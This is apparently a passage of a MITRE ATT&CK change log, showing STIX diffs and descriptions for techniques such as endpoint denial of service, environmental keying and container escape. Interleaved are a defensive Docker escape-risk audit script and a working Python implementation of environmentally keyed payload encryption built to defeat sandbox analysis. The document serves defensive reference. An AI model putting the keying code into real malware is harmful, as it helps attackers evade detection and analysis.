Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014) An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS). To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets. Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices. Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. 
In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.(Citation: ArsTechnica Great Firewall of China) For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498). |
| external_references[1]['source_name'] | capec | Cisco DoSdetectNetflow |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/227.html | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf |
| external_references[2]['source_name'] | capec | FSISAC FraudNetDoS September 2012 |
| external_references[2]['url'] | https://capec.mitre.org/data/definitions/131.html | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf |
| external_references[3]['source_name'] | capec | ArsTechnica Great Firewall of China |
| external_references[3]['url'] | https://capec.mitre.org/data/definitions/130.html | https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/ |
| external_references[4]['source_name'] | capec | FireEye OpPoisonedHandover February 2016 |
| external_references[4]['url'] | https://capec.mitre.org/data/definitions/125.html | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html |
| external_references[5]['source_name'] | FireEye OpPoisonedHandover February 2016 | USNYAG IranianBotnet March 2016 |
| external_references[5]['description'] | Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019. | Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged |
| external_references[6]['source_name'] | FSISAC FraudNetDoS September 2012 | Symantec DDoS October 2014 |
| external_references[6]['description'] | FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019. | Wueest, C.. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019. |
| external_references[6]['url'] | https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf | https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf |
| external_references[7]['source_name'] | Symantec DDoS October 2014 | capec |
| external_references[7]['url'] | https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf | https://capec.mitre.org/data/definitions/227.html |
| external_references[8]['source_name'] | USNYAG IranianBotnet March 2016 | capec |
| external_references[8]['url'] | https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged | https://capec.mitre.org/data/definitions/131.html |
| external_references[9]['source_name'] | ArsTechnica Great Firewall of China | capec |
| external_references[9]['url'] | https://arstechnica.com/information-technology/2015/03/massive-denial-of-service-attack-on-github-tied-to-chinese-government/ | https://capec.mitre.org/data/definitions/130.html |
| external_references[10]['source_name'] | Cisco DoSdetectNetflow | capec |
| external_references[10]['url'] | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf | https://capec.mitre.org/data/definitions/125.html |
| x_mitre_data_sources[0] | Sensor Health: Host Status | Application Log: Application Log Content |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[2] | Network Traffic: Network Traffic Content | Sensor Health: Host Status |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content |
| Description |
|---|
| Adversaries may environmentally key payloads or other features of malware to evade defenses and constrain execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary-supplied, environment-specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents) Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs). Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. 
Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload, the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying involves checking for an expected target-specific value that must match for decryption and subsequent execution to be successful. |
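The mechanics in the description reduce to: canonicalize a target-specific value, derive a key from it, and ship only the ciphertext plus an integrity tag so that the wrong environment yields nothing rather than garbage. The block below is an added example, not code from ATT&CK, Ebowla, or any cited paper. It uses only the Python standard library: HMAC-SHA256 for HKDF-style key derivation, an HMAC-SHA256 counter keystream as the cipher, and encrypt-then-MAC; a real implementation would substitute AES-GCM from a vetted library. The joined AD domain and hostname are two of the value types the description lists; the sample environment values and the canonical form are constructed assumptions.

```python
"""Environmental keying: payload key derived from target-specific values.

Added example (not ATT&CK's, Ebowla's or any cited tool's code). Stdlib only;
the HMAC counter keystream stands in for a real AEAD such as AES-GCM.
"""
import hashlib
import hmac
import os


def canonical_env_value(ad_domain, hostname):
    """Normalize the keying material so trivial case/whitespace differences don't change the key."""
    return f"{ad_domain.strip().lower()}|{hostname.strip().lower()}".encode()


def derive_keys(env_value, salt):
    """HKDF-like extract/expand: separate encryption and MAC keys from one environment value."""
    prk = hmac.new(salt, env_value, hashlib.sha256).digest()
    enc_key = hmac.new(prk, b"enc\x01", hashlib.sha256).digest()
    mac_key = hmac.new(prk, b"mac\x01", hashlib.sha256).digest()
    return enc_key, mac_key


def _keystream(enc_key, nonce, length):
    """Counter-mode keystream built from HMAC-SHA256 (stand-in for a real stream cipher)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(enc_key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def key_payload(payload, env_value, salt=None, nonce=None):
    """Encrypt payload under a key derived from env_value; the key itself is never shipped."""
    salt = salt or os.urandom(16)
    nonce = nonce or os.urandom(16)
    enc_key, mac_key = derive_keys(env_value, salt)
    ct = bytes(a ^ b for a, b in zip(payload, _keystream(enc_key, nonce, len(payload))))
    tag = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    return salt + nonce + ct + tag          # the only thing delivered to the target


def unkey_payload(blob, env_value):
    """Recover the payload only if the running environment reproduces the key.

    Returns None on mismatch: a sandbox without the expected domain/hostname
    gets neither the plaintext nor a crash to analyse."""
    salt, nonce, ct, tag = blob[:16], blob[16:32], blob[32:-32], blob[-32:]
    enc_key, mac_key = derive_keys(env_value, salt)
    expected = hmac.new(mac_key, salt + nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(enc_key, nonce, len(ct))))


# Constructed values; a stager would read these from the host at run time.
TARGET_ENV = canonical_env_value("CORP.EXAMPLE", "FIN-WS-042")
SANDBOX_ENV = canonical_env_value("WORKGROUP", "DESKTOP-ANALYSIS")
PAYLOAD = b"echo stage-two would run here"


def demo():
    """Key the payload for TARGET_ENV, then try to unkey it on target and in a sandbox."""
    blob = key_payload(PAYLOAD, TARGET_ENV)
    return unkey_payload(blob, TARGET_ENV), unkey_payload(blob, SANDBOX_ENV)


if __name__ == "__main__":
    on_target, in_sandbox = demo()
    print("target  :", on_target)
    print("sandbox :", in_sandbox)
```

The tag check is what makes this a guardrail rather than mere obfuscation: an analyst holding the blob but not the environment value has to brute-force the domain/hostname space, and the sandbox branch returns cleanly instead of executing corrupted bytes. Note the contrast with sandbox evasion in the description: nothing here looks for sandbox indicators; it only checks that the expected value is present.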
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-06-09 18:53:58.159000+00:00 | 2022-05-04 14:52:51.290000+00:00 |
| external_references[1]['source_name'] | EK Clueless Agents | Proofpoint Router Malvertising |
| external_references[1]['description'] | Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019. | Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019. |
| external_references[1]['url'] | https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf | https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices |
| external_references[3]['source_name'] | Proofpoint Router Malvertising | Ebowla: Genetic Malware |
| external_references[3]['description'] | Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019. | Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019. |
| external_references[3]['url'] | https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices | https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf |
| external_references[4]['source_name'] | EK Impeding Malware Analysis | EK Clueless Agents |
| external_references[4]['description'] | Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019. | Riordan, J., Schneier, B. (1998, June 18). Environmental Key Generation towards Clueless Agents. Retrieved January 18, 2019. |
| external_references[4]['url'] | https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf | https://www.schneier.com/academic/paperfiles/paper-clueless-agents.pdf |
| external_references[5]['source_name'] | Environmental Keyed HTA | EK Impeding Malware Analysis |
| external_references[5]['description'] | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. | Song, C., et al. (2012, August 7). Impeding Automated Malware Analysis with Environment-sensitive Malware. Retrieved January 18, 2019. |
| external_references[5]['url'] | https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/ | https://pdfs.semanticscholar.org/2721/3d206bc3c1e8c229fb4820b6af09e7f975da.pdf |
| external_references[6]['source_name'] | Ebowla: Genetic Malware | Demiguise Guardrail Router Logo |
| external_references[6]['description'] | Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019. | Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019. |
| external_references[6]['url'] | https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf | https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js |
| external_references[7]['source_name'] | Demiguise Guardrail Router Logo | Environmental Keyed HTA |
| external_references[7]['description'] | Warren, R. (2017, August 2). Demiguise: virginkey.js. Retrieved January 17, 2019. | Warren, R. (2017, August 8). Smuggling HTA files in Internet Explorer/Edge. Retrieved January 16, 2019. |
| external_references[7]['url'] | https://github.com/nccgroup/demiguise/blob/master/examples/virginkey.js | https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/smuggling-hta-files-in-internet-exploreredge/ |
| x_mitre_defense_bypassed[1] | Host forensic analysis | Host Forensic Analysis |
| x_mitre_defense_bypassed[2] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[3] | Static file analysis | Static File Analysis |
| Old Description | New Description |
|---|---|
| Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. |
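The new description lists three configuration mistakes that make an escape cheap: a bind mount of the host filesystem, a privileged container (which can also load kernel modules), and a mounted `docker.sock`. The audit below, an added example and not ATT&CK or Docker project code, reads `docker inspect`-shaped records and reports each of those conditions so a defender can find them before an adversary does. The three records are constructed for the demo and contain only the fields the checks read; the sensitive-path and capability lists are the example's own choices (SYS_MODULE is the capability needed to load a kernel module, SYS_ADMIN covers mount and namespace operations).

```python
"""Audit `docker inspect` records for settings that make a container escape cheap.

Added example; not ATT&CK or Docker project code. Records mirror the shape of
`docker inspect` JSON (Linux bind syntax only) and are constructed for the demo.
"""
import json

# Capabilities that reach the host kernel: SYS_ADMIN (mount, namespaces),
# SYS_MODULE (load kernel modules), ALL (everything). List chosen for the example.
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_MODULE", "ALL"}
# Host paths whose bind mount hands over the host: root, cron/boot/config
# directories, and the container runtime's own state. List chosen for the example.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/boot", "/proc", "/sys",
                        "/var/spool/cron", "/var/lib/docker", "/var/lib/kubelet"}
RUNTIME_SOCKETS = {"/var/run/docker.sock", "/run/docker.sock",
                   "/run/containerd/containerd.sock"}


def _bind_mounts(record):
    """Map (host_path, container_path) -> writable, merging Binds and Mounts.

    docker inspect reports the same bind in both HostConfig.Binds and Mounts,
    so the dict key de-duplicates them.
    """
    mounts = {}
    for spec in record.get("HostConfig", {}).get("Binds") or []:
        parts = spec.split(":")                      # host:container[:opts]
        host, inside = parts[0], (parts[1] if len(parts) > 1 else parts[0])
        opts = parts[2].split(",") if len(parts) > 2 else []
        mounts[(host, inside)] = "ro" not in opts
    for m in record.get("Mounts") or []:
        if m.get("Type") == "bind":
            mounts[(m["Source"], m["Destination"])] = m.get("RW", True)
    return mounts


def _under(path, root):
    """True when path is root itself or lies below it."""
    norm = path.rstrip("/") or "/"
    return norm == root or (root != "/" and norm.startswith(root + "/"))


def escape_risks(record):
    """Findings for one container; an empty list means no check fired."""
    hc = record.get("HostConfig", {})
    name = record.get("Name", "?").lstrip("/")
    findings = []
    if hc.get("Privileged"):
        findings.append(f"{name}: privileged container (all capabilities, host devices)")
    # Newer daemons report CAP_SYS_MODULE, older ones SYS_MODULE; normalise both.
    caps = {c[4:] if c.startswith("CAP_") else c for c in (hc.get("CapAdd") or [])}
    if caps & DANGEROUS_CAPS:
        findings.append(f"{name}: CapAdd grants {sorted(caps & DANGEROUS_CAPS)}")
    for (host, inside), writable in _bind_mounts(record).items():
        if (host.rstrip("/") or "/") in RUNTIME_SOCKETS:
            findings.append(f"{name}: runtime socket {host} mounted at {inside}")
        elif any(_under(host, root) for root in SENSITIVE_HOST_PATHS):
            mode = "writable" if writable else "read-only"
            findings.append(f"{name}: host path {host} bind-mounted at {inside} ({mode})")
    return findings


def audit(records):
    """Name -> findings for every container with at least one finding."""
    result = {}
    for record in records:
        risks = escape_risks(record)
        if risks:
            result[record.get("Name", "?").lstrip("/")] = risks
    return result


# Constructed sample: a plain web container, an "agent" with the Docker socket
# mounted, and a privileged container with the host root bind-mounted.
SAMPLE_INSPECT = json.loads(r"""
[
  {"Name": "/web", "HostConfig": {"Privileged": false, "CapAdd": null,
     "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
   "Mounts": [{"Type": "bind", "Source": "/srv/www", "Destination": "/usr/share/nginx/html", "RW": false}]},
  {"Name": "/agent", "HostConfig": {"Privileged": false, "CapAdd": null,
     "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
   "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock", "RW": true}]},
  {"Name": "/miner", "HostConfig": {"Privileged": true, "CapAdd": ["SYS_MODULE"],
     "Binds": ["/:/mnt/host"]},
   "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt/host", "RW": true}]}
]
""")

if __name__ == "__main__":
    for name, risks in audit(SAMPLE_INSPECT).items():
        for risk in risks:
            print(risk)
```

Against live hosts, feed it `docker inspect $(docker ps -q)`; the same checks map onto Kubernetes pod specs (`securityContext.privileged`, `capabilities.add`, `hostPath` volumes), which is where the CVE-2022-0185 and keyctl cases cited above were found.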
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 14:59:35.913000+00:00 | 2022-10-21 20:03:06.707000+00:00 |
| description | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host, or utilizing a privileged container to run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. | Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview) There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask) Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open) Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host. |
| external_references[1]['source_name'] | Docker Overview | Container Escape |
| external_references[1]['description'] | Docker. (n.d.). Docker Overview. Retrieved March 30, 2021. | 0xn3va. (n.d.). Escaping. Retrieved May 27, 2022. |
| external_references[1]['url'] | https://docs.docker.com/get-started/overview/ | https://0xn3va.gitbook.io/cheat-sheets/container/escaping |
| external_references[2]['source_name'] | Docker Bind Mounts | Windows Server Containers Are Open |
| external_references[2]['description'] | Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021. | Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021. |
| external_references[2]['url'] | https://docs.docker.com/storage/bind-mounts/ | https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/ |
| external_references[3]['source_name'] | Trend Micro Privileged Container | Docker Overview |
| external_references[3]['description'] | Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021. | Docker. (n.d.). Docker Overview. Retrieved March 30, 2021. |
| external_references[3]['url'] | https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html | https://docs.docker.com/get-started/overview/ |
| external_references[4]['source_name'] | Intezer Doki July 20 | Docker Bind Mounts |
| external_references[4]['description'] | Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021. | Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021. |
| external_references[4]['url'] | https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/ | https://docs.docker.com/storage/bind-mounts/ |
| external_references[5]['source_name'] | Windows Server Containers Are Open | Trend Micro Privileged Container |
| external_references[5]['description'] | Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021. | Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021. |
| external_references[5]['url'] | https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/ | https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html |
| x_mitre_data_sources[3] | Process: Process Creation | Volume: Volume Modification |
| x_mitre_version | 1.1 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Intezer Doki July 20', 'description': 'Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.', 'url': 'https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/'} | |
| external_references | {'source_name': 'Crowdstrike Kubernetes Container Escape', 'description': 'Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.', 'url': 'https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/'} | |
| external_references | {'source_name': 'Keyctl-unmask', 'description': 'Mark Manning. (2020, July 23). Keyctl-unmask: "Going Florida" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.', 'url': 'https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/'} | |
| x_mitre_contributors | CrowdStrike | |
| x_mitre_contributors | Eran Ayalon, Cybereason | |
| x_mitre_contributors | Oren Ofer, Cybereason | |
| x_mitre_contributors | Ilan Sokol, Cybereason | |
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Kernel: Kernel Module Load | |
| Old Description | New Description |
|---|---|
| Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. | Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 20:11:14.193000+00:00 | 2022-10-19 15:44:20.456000+00:00 |
| description | Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware) Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges. | Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is 